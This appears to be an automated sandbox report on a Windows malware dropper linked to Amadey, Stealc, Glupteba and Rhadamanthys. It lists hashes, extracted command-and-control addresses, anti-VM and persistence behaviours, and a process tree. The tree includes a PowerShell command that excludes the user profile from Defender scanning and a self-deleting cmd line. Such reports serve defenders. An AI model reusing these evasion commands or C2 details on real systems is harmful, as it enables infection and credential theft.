Analysis
-
max time kernel
70s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
01-04-2024 13:28
Static task
static1
Behavioral task
behavioral1
Sample
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
Resource
win10v2004-20240226-en
General
-
Target
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe
-
Size
1.8MB
-
MD5
0193ae529e1b5a9af6c9e0a9764e7c0f
-
SHA1
4db7d28f2b787386c3f60cc3d646d25553311ae3
-
SHA256
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e
-
SHA512
355f310885fc61f433244bdd11b65d534891e77daffb2fe4005f59f619ce564615b8959e2a99049d849dd07dfccdeba07889d839344788e5dfbc58f9b738b5c7
-
SSDEEP
49152:mGfT2VqIZmU3m1DLsWTHXUn8jo59exxc82:mWT67ZPULsGHkzWxc
Malware Config
Extracted
amadey
4.17
http://185.215.113.32
-
install_dir
00c07260dc
-
install_file
explorgu.exe
-
strings_key
461809bd97c251ba0c0c8450c7055f1d
-
url_paths
/yandex/index.php
Extracted
stealc
http://185.172.128.209
-
url_path
/3cd2b41cbde8fc9c.php
Signatures
-
Glupteba payload 13 IoCs
Processes:
resource yara_rule behavioral1/memory/4864-145-0x0000000002E90000-0x000000000377B000-memory.dmp family_glupteba behavioral1/memory/4440-146-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2492-147-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4864-150-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4864-234-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4440-258-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2492-264-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4440-388-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4864-380-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4440-441-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2492-442-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/4864-438-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba behavioral1/memory/2492-391-0x0000000000400000-0x0000000000D1C000-memory.dmp family_glupteba -
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
q6fTDfvQIk0vQg4JK85pUzGa.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" q6fTDfvQIk0vQg4JK85pUzGa.exe -
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
RegAsm.exedescription pid process target process PID 4240 created 2540 4240 RegAsm.exe sihost.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes:
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exeq6fTDfvQIk0vQg4JK85pUzGa.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorgu.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ q6fTDfvQIk0vQg4JK85pUzGa.exe -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exerundll32.exeflow pid process 93 1376 rundll32.exe 94 392 rundll32.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes:
netsh.exenetsh.exenetsh.exepid process 4364 netsh.exe 5900 netsh.exe 816 netsh.exe -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exeq6fTDfvQIk0vQg4JK85pUzGa.exeInstall.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorgu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion q6fTDfvQIk0vQg4JK85pUzGa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion q6fTDfvQIk0vQg4JK85pUzGa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
explorgu.exeT69JRNcJ5Pb8Kvyeh54nUcEz.exeu2rg.0.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation explorgu.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation T69JRNcJ5Pb8Kvyeh54nUcEz.exe Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation u2rg.0.exe -
Drops startup file 10 IoCs
Processes:
msbuild.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OSuUnFhC1ICkIorcm355R2bi.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EbXV7yN12JQAbskeKEH8vIYI.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qFAlUbBZF8Hnddjo0tExhsKL.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p8MIG2rw0ZilMg9M3aDsd4JK.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1oYWmyAvelvfmRoSFD3lMy6.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\K4tmRJm1zEjbzpZXcktizeBp.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PIWBQAD48yiHI89Wk3gprxiQ.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xDEk0GlCtkd2x31oxGqjv5eb.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TQawjy54jNWz1k483SiiVTe6.bat msbuild.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IcjvHSgq4VdWBnbDXekf7YjN.bat msbuild.exe -
Executes dropped EXE 22 IoCs
Processes:
explorgu.exefile300un.exeT69JRNcJ5Pb8Kvyeh54nUcEz.exeFHZBtr50rRcfTdllNwk2pZND.exeKR7axLmK85pHCtYC8Jy6HuM8.exeGMzYdBCcCSK6EIzmSzSqgTWZ.exenZXf9m6T3j0fmQmAo2ECjkpw.exeu2rg.0.exeG0jT3CGihLOYKL4sbc74s4ak.exeq6fTDfvQIk0vQg4JK85pUzGa.exeBp69MLnON446Ce82F0kC5faD.exeG0jT3CGihLOYKL4sbc74s4ak.exeLxSSn55Rw88rJ6lmDBQ8L4ps.exeu2rg.1.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exeInstall.exeInstall.exeInstall.exeInstall.exeBGIIDAEBGC.exepid process 3884 explorgu.exe 4548 file300un.exe 3580 T69JRNcJ5Pb8Kvyeh54nUcEz.exe 4440 FHZBtr50rRcfTdllNwk2pZND.exe 4864 KR7axLmK85pHCtYC8Jy6HuM8.exe 2492 GMzYdBCcCSK6EIzmSzSqgTWZ.exe 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe 976 u2rg.0.exe 3800 G0jT3CGihLOYKL4sbc74s4ak.exe 2344 q6fTDfvQIk0vQg4JK85pUzGa.exe 2584 Bp69MLnON446Ce82F0kC5faD.exe 3076 G0jT3CGihLOYKL4sbc74s4ak.exe 4748 LxSSn55Rw88rJ6lmDBQ8L4ps.exe 1408 u2rg.1.exe 3780 G0jT3CGihLOYKL4sbc74s4ak.exe 2424 G0jT3CGihLOYKL4sbc74s4ak.exe 5016 G0jT3CGihLOYKL4sbc74s4ak.exe 4348 Install.exe 3180 Install.exe 4404 Install.exe 4380 Install.exe 5784 BGIIDAEBGC.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Software\Wine bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe Key opened \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Software\Wine explorgu.exe -
Loads dropped DLL 10 IoCs
Processes:
rundll32.exerundll32.exeG0jT3CGihLOYKL4sbc74s4ak.exeu2rg.0.exeG0jT3CGihLOYKL4sbc74s4ak.exerundll32.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exepid process 4776 rundll32.exe 1376 rundll32.exe 3800 G0jT3CGihLOYKL4sbc74s4ak.exe 976 u2rg.0.exe 976 u2rg.0.exe 3076 G0jT3CGihLOYKL4sbc74s4ak.exe 392 rundll32.exe 3780 G0jT3CGihLOYKL4sbc74s4ak.exe 2424 G0jT3CGihLOYKL4sbc74s4ak.exe 5016 G0jT3CGihLOYKL4sbc74s4ak.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\q6fTDfvQIk0vQg4JK85pUzGa.exe themida behavioral1/memory/2344-389-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida behavioral1/memory/2344-415-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida behavioral1/memory/2344-398-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida behavioral1/memory/2344-433-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida behavioral1/memory/2344-439-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida behavioral1/memory/2344-480-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida behavioral1/memory/2344-423-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida behavioral1/memory/2344-392-0x00007FF7E4380000-0x00007FF7E4E8A000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
q6fTDfvQIk0vQg4JK85pUzGa.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA q6fTDfvQIk0vQg4JK85pUzGa.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
G0jT3CGihLOYKL4sbc74s4ak.exeG0jT3CGihLOYKL4sbc74s4ak.exedescription ioc process File opened (read-only) \??\F: G0jT3CGihLOYKL4sbc74s4ak.exe File opened (read-only) \??\D: G0jT3CGihLOYKL4sbc74s4ak.exe File opened (read-only) \??\F: G0jT3CGihLOYKL4sbc74s4ak.exe File opened (read-only) \??\D: G0jT3CGihLOYKL4sbc74s4ak.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 107 api.myip.com 108 api.myip.com 114 ipinfo.io 115 ipinfo.io -
Drops file in System32 directory 4 IoCs
Processes:
q6fTDfvQIk0vQg4JK85pUzGa.exedescription ioc process File opened for modification C:\Windows\System32\GroupPolicy q6fTDfvQIk0vQg4JK85pUzGa.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini q6fTDfvQIk0vQg4JK85pUzGa.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol q6fTDfvQIk0vQg4JK85pUzGa.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI q6fTDfvQIk0vQg4JK85pUzGa.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exeq6fTDfvQIk0vQg4JK85pUzGa.exepid process 1376 bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe 3884 explorgu.exe 2344 q6fTDfvQIk0vQg4JK85pUzGa.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
file300un.exenZXf9m6T3j0fmQmAo2ECjkpw.exedescription pid process target process PID 4548 set thread context of 2884 4548 file300un.exe msbuild.exe PID 3816 set thread context of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe -
Drops file in Windows directory 1 IoCs
Processes:
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exedescription ioc process File created C:\Windows\Tasks\explorgu.job bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exepid process 5652 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 6 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2020 3816 WerFault.exe nZXf9m6T3j0fmQmAo2ECjkpw.exe 2372 4240 WerFault.exe RegAsm.exe 3128 3580 WerFault.exe T69JRNcJ5Pb8Kvyeh54nUcEz.exe 2372 4240 WerFault.exe RegAsm.exe 5632 976 WerFault.exe u2rg.0.exe 708 4440 WerFault.exe FHZBtr50rRcfTdllNwk2pZND.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
u2rg.1.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2rg.1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2rg.1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI u2rg.1.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
u2rg.0.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 u2rg.0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString u2rg.0.exe -
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5696 schtasks.exe 3944 schtasks.exe 6060 schtasks.exe 6124 schtasks.exe 3980 schtasks.exe 4440 schtasks.exe 2892 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeexplorgu.exepowershell.exeu2rg.0.exerundll32.exepowershell.exeRegAsm.exedialer.exepowershell.exepowershell.exepowershell.exepid process 1376 bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe 1376 bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe 3884 explorgu.exe 3884 explorgu.exe 1100 powershell.exe 1100 powershell.exe 976 u2rg.0.exe 976 u2rg.0.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 1376 rundll32.exe 4868 powershell.exe 4868 powershell.exe 4868 powershell.exe 4240 RegAsm.exe 4240 RegAsm.exe 2568 dialer.exe 2568 dialer.exe 2568 dialer.exe 2568 dialer.exe 976 u2rg.0.exe 976 u2rg.0.exe 2528 powershell.exe 2528 powershell.exe 4648 powershell.exe 4648 powershell.exe 3472 powershell.exe 3472 powershell.exe 2528 powershell.exe 3472 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
file300un.exepowershell.exemsbuild.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4548 file300un.exe Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 2884 msbuild.exe Token: SeDebugPrivilege 4868 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 4648 powershell.exe Token: SeDebugPrivilege 3472 powershell.exe -
Suspicious use of FindShellTrayWindow 8 IoCs
Processes:
bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exeu2rg.1.exepid process 1376 bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe -
Suspicious use of SendNotifyMessage 7 IoCs
Processes:
u2rg.1.exepid process 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe 1408 u2rg.1.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
explorgu.exefile300un.exemsbuild.exenZXf9m6T3j0fmQmAo2ECjkpw.exeT69JRNcJ5Pb8Kvyeh54nUcEz.exerundll32.exerundll32.exeRegAsm.exedescription pid process target process PID 3884 wrote to memory of 4548 3884 explorgu.exe file300un.exe PID 3884 wrote to memory of 4548 3884 explorgu.exe file300un.exe PID 4548 wrote to memory of 1100 4548 file300un.exe powershell.exe PID 4548 wrote to memory of 1100 4548 file300un.exe powershell.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 4548 wrote to memory of 2884 4548 file300un.exe msbuild.exe PID 2884 wrote to memory of 3580 2884 msbuild.exe T69JRNcJ5Pb8Kvyeh54nUcEz.exe PID 2884 wrote to memory of 3580 2884 msbuild.exe T69JRNcJ5Pb8Kvyeh54nUcEz.exe PID 2884 wrote to memory of 3580 2884 msbuild.exe T69JRNcJ5Pb8Kvyeh54nUcEz.exe PID 2884 wrote to memory of 4864 2884 msbuild.exe KR7axLmK85pHCtYC8Jy6HuM8.exe PID 2884 wrote to memory of 4864 2884 msbuild.exe KR7axLmK85pHCtYC8Jy6HuM8.exe PID 2884 wrote to memory of 4864 2884 msbuild.exe KR7axLmK85pHCtYC8Jy6HuM8.exe PID 2884 wrote to memory of 4440 2884 msbuild.exe schtasks.exe PID 2884 wrote to memory of 4440 2884 msbuild.exe schtasks.exe PID 2884 wrote to memory of 4440 2884 msbuild.exe schtasks.exe PID 2884 wrote to memory of 2492 2884 msbuild.exe GMzYdBCcCSK6EIzmSzSqgTWZ.exe PID 2884 wrote to memory of 2492 2884 msbuild.exe GMzYdBCcCSK6EIzmSzSqgTWZ.exe PID 2884 wrote to memory of 2492 2884 msbuild.exe GMzYdBCcCSK6EIzmSzSqgTWZ.exe PID 2884 wrote to memory of 3816 2884 msbuild.exe nZXf9m6T3j0fmQmAo2ECjkpw.exe PID 2884 wrote to memory of 3816 2884 msbuild.exe nZXf9m6T3j0fmQmAo2ECjkpw.exe PID 2884 wrote to memory of 3816 2884 msbuild.exe nZXf9m6T3j0fmQmAo2ECjkpw.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3816 wrote to memory of 4240 3816 nZXf9m6T3j0fmQmAo2ECjkpw.exe RegAsm.exe PID 3580 wrote to memory of 976 3580 T69JRNcJ5Pb8Kvyeh54nUcEz.exe u2rg.0.exe PID 3580 wrote to memory of 976 3580 T69JRNcJ5Pb8Kvyeh54nUcEz.exe u2rg.0.exe PID 3580 wrote to memory of 976 3580 T69JRNcJ5Pb8Kvyeh54nUcEz.exe u2rg.0.exe PID 3884 wrote to memory of 4776 3884 explorgu.exe rundll32.exe PID 3884 wrote to memory of 4776 3884 explorgu.exe rundll32.exe PID 3884 wrote to memory of 4776 3884 explorgu.exe rundll32.exe PID 4776 wrote to memory of 1376 4776 rundll32.exe rundll32.exe PID 4776 wrote to memory of 1376 4776 rundll32.exe rundll32.exe PID 1376 wrote to memory of 1028 1376 rundll32.exe netsh.exe PID 1376 wrote to memory of 1028 1376 rundll32.exe netsh.exe PID 1376 wrote to memory of 4868 1376 rundll32.exe powershell.exe PID 1376 wrote to memory of 4868 1376 rundll32.exe powershell.exe PID 2884 wrote to memory of 3800 2884 msbuild.exe G0jT3CGihLOYKL4sbc74s4ak.exe PID 2884 wrote to memory of 3800 2884 msbuild.exe G0jT3CGihLOYKL4sbc74s4ak.exe PID 2884 wrote to memory of 3800 2884 msbuild.exe G0jT3CGihLOYKL4sbc74s4ak.exe PID 4240 wrote to memory of 2568 4240 RegAsm.exe dialer.exe PID 4240 wrote to memory of 2568 4240 RegAsm.exe dialer.exe PID 4240 wrote to memory of 2568 4240 RegAsm.exe dialer.exe PID 4240 wrote to memory of 2568 4240 RegAsm.exe dialer.exe PID 2884 wrote to memory of 2344 2884 msbuild.exe q6fTDfvQIk0vQg4JK85pUzGa.exe PID 2884 wrote to memory of 2344 2884 msbuild.exe q6fTDfvQIk0vQg4JK85pUzGa.exe PID 2884 wrote to memory of 2584 2884 msbuild.exe Bp69MLnON446Ce82F0kC5faD.exe PID 2884 wrote to memory of 2584 2884 msbuild.exe Bp69MLnON446Ce82F0kC5faD.exe PID 2884 wrote to memory of 2584 2884 msbuild.exe Bp69MLnON446Ce82F0kC5faD.exe PID 4240 wrote to memory of 2568 4240 RegAsm.exe dialer.exe PID 3580 wrote to memory of 1408 3580 T69JRNcJ5Pb8Kvyeh54nUcEz.exe u2rg.1.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2540
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2568
-
-
C:\Users\Admin\AppData\Local\Temp\bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe"C:\Users\Admin\AppData\Local\Temp\bf7d3fec406989b99aeec532dd81f4a4a999b77bee81c2f7102b778b52826b2e.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1376
-
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exeC:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1001085001\file300un.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4548 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"3⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Users\Admin\Pictures\T69JRNcJ5Pb8Kvyeh54nUcEz.exe"C:\Users\Admin\Pictures\T69JRNcJ5Pb8Kvyeh54nUcEz.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3580 -
C:\Users\Admin\AppData\Local\Temp\u2rg.0.exe"C:\Users\Admin\AppData\Local\Temp\u2rg.0.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:976 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe"6⤵PID:5396
-
C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe"C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe"7⤵
- Executes dropped EXE
PID:5784 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\BGIIDAEBGC.exe8⤵PID:5164
-
C:\Windows\SysWOW64\PING.EXEping 2.2.2.2 -n 1 -w 30009⤵
- Runs ping.exe
PID:1420
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 27446⤵
- Program crash
PID:5632
-
-
-
C:\Users\Admin\AppData\Local\Temp\u2rg.1.exe"C:\Users\Admin\AppData\Local\Temp\u2rg.1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1408 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵PID:5792
-
-
-
